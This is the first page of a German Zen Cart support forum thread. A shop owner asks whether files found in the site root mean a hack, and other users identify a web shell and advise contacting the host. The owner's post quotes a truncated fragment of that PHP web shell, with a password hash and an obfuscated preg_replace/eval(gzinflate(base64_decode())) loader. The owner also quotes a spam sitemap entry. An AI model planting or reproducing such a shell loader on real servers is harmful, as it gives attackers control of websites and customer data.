Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 18

Thema: Hacker, gehackt, Sicherheitslücke ?

  1. #1
    Padawan Stufe I Avatar von aykatshop
    Registriert seit
    31.10.2008
    Beiträge
    41
    Themen
    8
    DANKE
    8
    Erhaltene Danke: 0

    Standard Hacker, gehackt, Sicherheitslücke ?

    Ich bin mir nicht sicher, ob meine Seite gehackt wurde ? (Shop 1.3.9.h)
    Habe heute folgende Dateien gefunden, kennt jemand diese Dateien ?:

    web.php und Web.sitemap

    Teilauszug: web.php:
    Code:
    <?php
     
    $auth_pass = "5416d7cd6ef195a0f7622a9c56b55e84";
     
    $color = "#df5";
     
    $default_action = 'FilesMan';
     
    $default_use_ajax = true;
     
    $default_charset = 'Windows-1251';
     
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65
    Teilauszug: Web.sitemap:

    Code:
         <siteMapNode title="zip laufwerk 100 mb iomega extern 100mb ohne netzteil p 249" description="Aykat Computer ZIP Laufwerk 100

    Ist dies ein Hackerversuch oder ist die Beunruhigung unnötig ?
    Habe beide Dateien gesichert und dann auf der Homepage gelöscht.

    Vielen Dank für Eure Reaktion im voraus.

    Schöne Grüsse,

    Mukadderat

  2. #2
    Padawan Stufe VI Avatar von jjuno
    Registriert seit
    26.09.2008
    Beiträge
    758
    Themen
    14
    DANKE
    4
    Erhaltene Danke: 45

    Standard

    Schau dir mal folgenden Link an:

    http://forums.oscommerce.de/index.php?showtopic=75747

    Suche mal in den großen Suchmaschinen nach c99 shell.

    Was mich noch interessieren würde, wo (Verzeichniss) hast du diese web.php gefunden?
    Geändert von jjuno (05.05.2011 um 09:08 Uhr) Grund: nachtrag

  3. #3
    Padawan Stufe I Avatar von aykatshop
    Registriert seit
    31.10.2008
    Beiträge
    41
    Themen
    8
    DANKE
    8
    Erhaltene Danke: 0
    Erstellt von

    Frage web.php ?

    Danke für die Antwort,
    auf den Link bin ich gestern auch gestossen, da aber der Teil nach "default_charset" anderst ist und dort (Linkseite) auch keine für mich verständliche Hilfe drinsteht kam ich nicht wirklich weiter.
    Die Datei web.php und auch die andere befanden sich im Root-Verzeichnis, also ein Verzeichnis über dem Ordner Shop.

    Ich würde gerne wissen, ob das ein erfolgloser Hackversuch war und der Shop noch unverändert ist und welche Vorkehrungen bzw Änderungen ich nun machen muß. Wie finde ich heraus, ob noch andere Dateien verändert oder abgelegt wurden ? Ist die Version 1.3.9 sonst soweit sicher ?
    Bei den Administratoren im Shop ist keiner dazugekommen.

  4. #4
    Padawan Stufe VI Avatar von jjuno
    Registriert seit
    26.09.2008
    Beiträge
    758
    Themen
    14
    DANKE
    4
    Erhaltene Danke: 45

    Standard

    Das war wohl eher ein erfolgreicher Hack. Die web.php ist meiner Meinung nach eine
    Shell. Die Frage ist ja, was damit bezweckt wird. Da würde ich aber erst den Support
    beim Hoster fragen, was die davon halten.

  5. #5
    Padawan Stufe I Avatar von aykatshop
    Registriert seit
    31.10.2008
    Beiträge
    41
    Themen
    8
    DANKE
    8
    Erhaltene Danke: 0
    Erstellt von

    Standard

    hatte den Support angeschrieben und warte nun auf die Antwort.
    Danke nochmal.

  6. #6
    Jedi-Ritter Avatar von eentje
    Registriert seit
    17.09.2009
    Ort
    Bad Nieuweschans
    Beiträge
    1.385
    Themen
    6
    DANKE
    13
    Erhaltene Danke: 77

    Standard

    Mit was ich jetzt gesehen habe ist es kein hack im Zen Cart Shop sondern ein hack bei dein Hoster.

    Bist du auf shared hosting oder ein eigenen VPS oder Dedi?
    Rechtschreibungsfehler bitte verzeihen wegen das ich a) blond bin und b) niederländer

    I came, I saw, I got Zenned...

  7. #7
    Padawan Stufe I Avatar von aykatshop
    Registriert seit
    31.10.2008
    Beiträge
    41
    Themen
    8
    DANKE
    8
    Erhaltene Danke: 0
    Erstellt von

    Standard

    Solange der Shop nicht infiziert ist bin ich beruhigt, der Rest auf der Homepage ist nicht weiter wichtig und leicht wiederherzustellen.

    Es ist Shared Hosting.

  8. #8
    Padawan Stufe VI Avatar von jjuno
    Registriert seit
    26.09.2008
    Beiträge
    758
    Themen
    14
    DANKE
    4
    Erhaltene Danke: 45

    Standard

    Wer dir eine Shell unterschieben kann, kann auch auf deine Shopdateien zugreifen.

  9. #9
    Jedi-Ritter Avatar von eentje
    Registriert seit
    17.09.2009
    Ort
    Bad Nieuweschans
    Beiträge
    1.385
    Themen
    6
    DANKE
    13
    Erhaltene Danke: 77

    Standard

    genau was jjuno sagt...

    Zeit vielleicht ein anderen Hoster zu suchen....
    Rechtschreibungsfehler bitte verzeihen wegen das ich a) blond bin und b) niederländer

    I came, I saw, I got Zenned...

  10. #10
    Padawan Stufe I Avatar von aykatshop
    Registriert seit
    31.10.2008
    Beiträge
    41
    Themen
    8
    DANKE
    8
    Erhaltene Danke: 0
    Erstellt von

    Beitrag

    @ jjuno
    das stimmt natürlich.

    @ eentje
    war bisher zufrieden und der kümmert sich bisher recht schnell.

    zumindest habe ich regelmässig eine Sicherung des Shops gemacht.

Seite 1 von 2 12 LetzteLetzte

Ähnliche Themen

  1. Mein Shop wurde gehackt
    Von bienzle im Forum Archivierte Beiträge Zen-Cart Support
    Antworten: 7
    Letzter Beitrag: 06.01.2011, 10:30
  2. nach fast 1ner woche ruhe wieder gehackt
    Von panzer im Forum Archivierte Beiträge Zen-Cart Support
    Antworten: 10
    Letzter Beitrag: 03.09.2009, 12:32
  3. Brauche dringend Hilfe, wurde gehackt :-(
    Von Pixelfairy im Forum Archivierte Beiträge Zen-Cart Support
    Antworten: 3
    Letzter Beitrag: 03.08.2009, 13:24
  4. Hilfe, mein Shop wurde gehackt, Dringend Bitte.
    Von bios-service im Forum Archivierte Beiträge Zen-Cart Support
    Antworten: 38
    Letzter Beitrag: 07.07.2009, 09:51

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
zen-cart-pro.at
Zen Cart ist eine kostenlose unter der GPL-Lizenz veröffentlichte Open-Source Shopsoftware. Das System wird in den USA entwickelt, die amerikanische Website dazu ist www.zen-cart.com

Die deutsche Zen-Cart Version, um die es hier auf zen-cart-pro.at geht, ist eine Anpassung der amerikanischen Version an die Bedürfnisse von Onlineshopbetreibern im deutschsprachigen Raum.

Die deutsche Zen Cart Version wird von einem Team von Entwicklern in Österreich und Deutschland betreut, weiterentwickelt und supportet und steht kostenlos in unserem Downloadbereich zur Verfügung.

[mehr]
Follow Us
  • zen-cart-pro-at auf Twitter
  • zen-cart-pro-at auf Github
  • zen-cart-pro-at auf SourceForge
Aktuelle Version
Zen Cart 1.5.5 deutsch
Revision 1188 vom 02.12.2016
[Download]